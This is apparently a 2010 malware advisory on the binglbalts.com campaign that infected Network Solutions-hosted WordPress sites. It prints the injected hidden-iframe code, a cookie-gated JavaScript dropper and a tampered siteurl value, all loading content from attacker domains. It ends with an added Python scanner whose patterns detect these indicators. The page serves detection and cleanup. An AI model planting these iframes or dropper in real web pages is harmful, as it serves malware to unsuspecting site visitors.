binglbalts.com Malware
Updated: June 2, 2010
The binglbalts.com malware places one of a variety of malicious codes into websites. The malware has placed a malicious iframe into web pages, obfuscated JavaScript into external JavaScript files, and modified a database field in WordPress based websites.
The malware appears to have begun by infecting WordPress websites hosted by Network Solutions due to poor security in their systems. Network Solutions claimed they had fixed the cause on April 11, but they did not disclose what it was. On April 18, as websites were again being infected, Network Solutions said they were still dealing with issues. On April 20, they claimed that they had fixed the cause, but again they did not disclose what it was.

Approximately four months ago it infected some websites with an iframe pointing to globalwat.com in the footer.php of the WordPress theme being used. In early April it began placing iframes pointing to binglbalts.com in the footer.php of the WordPress theme being used. It then started modifying or creating external JavaScript files with code that created an iframe pointing to binglbalts.com. Then it started replacing the siteurl value in the WordPress database with an iframe pointing to networkads.net. Then it was replacing the siteurl value in the WordPress database with an iframe pointing to mainnetsoll.com and modifying or creating external JavaScript files with code that created an iframe pointing to mainnetsoll.com. After that, web pages were infected with JavaScript code that created an iframe pointing to corpadsinc.com, mainnetsoll.com, hugeadsorg.com, bigcorpads.com, ginopost.com, and grepad.com. Most recently Google has been flagging several hundred Network Solutions hosted websites for distributing malware from 92.63.111.0.
The infection has since spread to websites that are not WordPress based websites hosted by Network Solutions, infecting them with an iframe pointing to binglbalts.com or networkads.net. These websites have been infected via FTP. The most likely cause of these infections is that the FTP credentials of those websites were compromised when a computer that had accessed the website via FTP was used to visit a website infected with the binglbalts.com malware.
Recent Code Placed in Web Pages:
<iframe frameborder="0" onload=' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} '></iframe>
<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>
Recent Code in Standalone JavaScript Files:
function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; } var c=document.cookie; if (c.indexOf("seref")==-1) { document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} \'> </iframe>'); addCookie("seref", "1", 24); }
Recent Code In JavaScript Files:
Recent Code Placed in siteurl Value in WordPress Database:
"'><iframe style="display:none" height="0" width="1" src="http://networkads.net/grep/"'></iframe'>
"'><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"'></iframe'>
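The following is an added defender-side example, not code from the original page: a Python scanner that walks a site's document root and flags files carrying the indicators listed above (the iframe target domains, the /grep/ path, the self-loading onload iframe, and the "seref" cookie check from the JavaScript sample), plus a check that a WordPress siteurl option is still a bare URL. The sample files it writes are constructed from the code shown on this page. Matching the /grep/ path on any host, not only the named domains, is this example's own assumption so that a rotated domain is still caught; the page does not state that the path is stable.

```python
import re
import tempfile
from pathlib import Path

# Iframe target domains named on this page for the campaign.
INDICATOR_DOMAINS = [
    "binglbalts.com", "networkads.net", "mainnetsoll.com", "globalwat.com",
    "corpadsinc.com", "hugeadsorg.com", "bigcorpads.com", "ginopost.com", "grepad.com",
]

# Every sample on the page loads "/grep/" from the indicator host. Matching that path on
# any host is an assumption made in this example so the check still fires if the domain rotates.
GREP_PATH = re.compile(r"https?://([a-z0-9.-]+)/grep/", re.IGNORECASE)

# The iframe trick from the samples: no src attribute, an onload handler that sets its own
# src and collapses the frame to zero size. The optional backslash covers the
# JavaScript-escaped quote seen in the document.write() variant.
ONLOAD_IFRAME = re.compile(r"<iframe[^>]*onload=\s*\\?['\"]\s*if\s*\(\s*!this\.src\s*\)", re.IGNORECASE)

# The "seref" cookie the JavaScript dropper sets so it only injects once per 24 hours.
SEREF_COOKIE = re.compile(r'indexOf\(\s*"seref"\s*\)')


def scan_text(text):
    """Return a sorted list of indicator tags found in one file's contents."""
    found = set()
    lowered = text.lower()
    for domain in INDICATOR_DOMAINS:
        if domain in lowered:
            found.add("domain:" + domain)
    for m in GREP_PATH.finditer(text):
        found.add("grep-path:" + m.group(1).lower())
    if ONLOAD_IFRAME.search(text):
        found.add("onload-iframe")
    if SEREF_COOKIE.search(text):
        found.add("seref-cookie")
    return sorted(found)


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a document root and map each flagged file (relative path) to its indicator tags."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            tags = scan_text(path.read_text(errors="replace"))
            if tags:
                hits[path.relative_to(root).as_posix()] = tags
    return hits


def siteurl_is_clean(value):
    """A WordPress siteurl option must be a bare URL; any quote or tag means it was tampered with."""
    return re.fullmatch(r"https?://[A-Za-z0-9.-]+(:\d+)?(/[^\s<>'\"]*)?", value) is not None


# Constructed samples, copied from the code shown on this page.
SAMPLE_IFRAME = r"""<iframe frameborder="0" onload=' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} '></iframe>"""
SAMPLE_JS = r"""function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; } var c=document.cookie; if (c.indexOf("seref")==-1) { document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} \'> </iframe>'); addCookie("seref", "1", 24); }"""
SAMPLE_SITEURL = r'''"'><iframe style="display:none" height="0" width="1" src="http://networkads.net/grep/"'></iframe'>'''


def demo():
    """Write constructed infected and clean files into a temporary site tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "example"  # hypothetical theme path
        (theme / "js").mkdir(parents=True)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n" + SAMPLE_IFRAME + "\n</body></html>\n")
        (theme / "js" / "theme.js").write_text("/* theme script */\n" + SAMPLE_JS + "\n")
        (Path(tmp) / "index.html").write_text("<html><body>clean page</body></html>\n")
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, tags in demo().items():
        print(path, "->", ", ".join(tags))
    print("siteurl sample clean:", siteurl_is_clean(SAMPLE_SITEURL))
```

Run it against a site by calling scan_tree() on the document root; the siteurl check is meant to be run on the value read from the wp_options table, since the iframe in that field is rendered on every page and will not show up in any file on disk.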